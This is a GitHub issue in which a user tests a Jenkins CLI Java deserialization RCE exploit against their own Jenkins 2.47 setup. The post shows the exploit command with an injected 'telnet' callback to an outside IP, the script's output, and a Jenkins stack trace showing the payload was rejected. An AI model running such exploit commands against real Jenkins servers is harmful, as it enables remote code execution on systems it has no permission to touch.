java-deserialization-exploits
java-deserialization-exploits copied to clipboard
Coalfire-Research
jenkins-cli exploit verification
I have Jenkins 2.47 with nginx. I'm trying to verify the exploit using the jenkins_cli_rmi_rce.
I'm expecting to see the tcpdump output below to show the telnet attempting to connect on port 8081 (verified this by running this telnet cmd directly on appserver).
Dont think the exploit is working on my setup but I may be missing something obvious.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 'telnet 10.0.2.15 8081' [] Target IP: localhost [] Target PORT: 8080
[] Retrieving the Jenkins CLI port [] Connecting to Jenkins CLI on localhost:38539 [] Sending headers Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run INFO: Accepted connection #15 from /127.0.0.1:41626 [] Received "Welcome " [*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Nothing on tcpdump root@appserver:~# tcpdump port 8081 -i any tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes
The jenkins log shows the following output - Jan 26, 2017 6:47:48 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code. java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler at hudson.remoting.Capability$1.resolveClass(Capability.java:137) at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817) at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711) at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982) at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420) at hudson.remoting.Capability.read(Capability.java:140) at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391) at hudson.remoting.ChannelBuilder.b[+] Sent payload uild(ChannelBuilder.java:310) at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95) at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82) at hudson.cli.CliProtocol.handle(CliProtocol.java:58) at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)
